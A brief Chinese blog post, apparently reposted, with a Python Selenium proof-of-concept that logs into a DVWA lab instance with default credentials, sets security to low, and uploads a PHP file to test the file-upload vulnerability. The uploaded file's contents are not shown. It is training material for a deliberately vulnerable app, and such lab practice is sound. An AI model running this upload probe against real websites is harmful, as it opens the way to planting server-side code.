POC——DVWA's File Upload
作者:互联网
Level——low
最近了解了一下python的selenium,干脆用它写一个POC吧~
1 from selenium.webdriver import Chrome
2 from selenium.webdriver.support.ui import WebDriverWait
3 from selenium.webdriver.common.by import By
4 from selenium.webdriver.support.select import Select
5 import time
6
7 driver = Chrome()
8 driver.get("http://192.168.117.130/DVWA-1.9/login.php")
9 WebDriverWait(driver,10).until(lambda d:"Login" in d.title)
10 driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/input[1]').send_keys("admin")
11 driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/input[2]').send_keys("password")
12 driver.find_element(By.XPATH,'//*[@id="content"]/form/fieldset/p/input').click()
13
14 driver.find_element(By.XPATH,'//*[@id="main_menu_padded"]/ul[3]/li[1]').click()
15 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/form/select').click()
16 loc = (By.XPATH,'//*[@id="main_body"]/div/form/select')
17 ele = driver.find_element(*loc)
18 s = Select(ele)
19 s.select_by_value("low")
20 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/form/input[1]').click()
21
22 driver.find_element(By.XPATH,'//*[@id="main_menu_padded"]/ul[2]/li[5]').click()
23 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/form/input[2]').send_keys('F:\Python\Project\POC\POC(Proof Of Concept)\one.php')
24 driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/form/input[3]').click()
25 response = driver.find_element(By.XPATH,'//*[@id="main_body"]/div/div/pre')
26
27 re = 'one.php'
28 flag=re in str(response.text)
29
30 if flag:
31 print("It looks likely vulnerable")
32 else:
33 print("It is strong")
34
35 driver.close()
标签:XPATH,driver,DVWA,POC,find,File,div,element,id 来源: https://www.cnblogs.com/wavesky/p/16371619.html